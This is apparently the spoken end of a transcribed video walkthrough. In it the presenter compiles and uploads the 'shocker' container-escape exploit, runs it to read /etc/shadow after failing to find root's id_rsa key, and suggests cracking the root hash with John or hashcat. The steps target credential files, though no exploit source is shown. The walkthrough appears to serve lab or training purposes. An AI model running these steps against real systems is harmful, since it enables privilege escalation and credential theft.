shocker ls. Now there is no shocker file. Come here, upload, and shocker /root /shocker. It's uploading, and if we list here ls, so shocker is there now. So this time chmod +x shocker, and just execute it. So reset ./shocker, hit enter again, and resolving id_RSA, but I don't think there is id_RSA. You can see here there is id_RSA.public known host and authorized keys file there, but id_RSA is not there, so you cannot get id_RSA. Reset this again, and rm -rf shocker, and come back to this file one more time, and this time instead of getting id_RSA, I am gonna call etc shadow, so we can get the root hash. Fine, save this file, come back here and clear that, gcc shocker.c --o shocker, and from here we can upload again, upload shocker root_shocker. If we say ls here, no shocker, but this time if I say ls, you can see upload is complete and we got shocker here. chmod +x and shocker. Now ./shocker, hit enter again, and what? Oh, come on. This should be etc/shadow, my bad. As much you want to rm -rf shocker clear, gcc shocker rm -rf shocker, so delete this file again and reset ls, and there is no shocker file. Again upload this list and upload completed. List here, shocker file is there, chmod +x shocker and ./shocker, hit enter, and this time we got the etc shadow file. So now you can get this root hash and you can crack it from the John or from the hashcat. So that's it for this video. Hope you like the content. If you like the content, please like, subscribe and share. See you in the next video. Bye.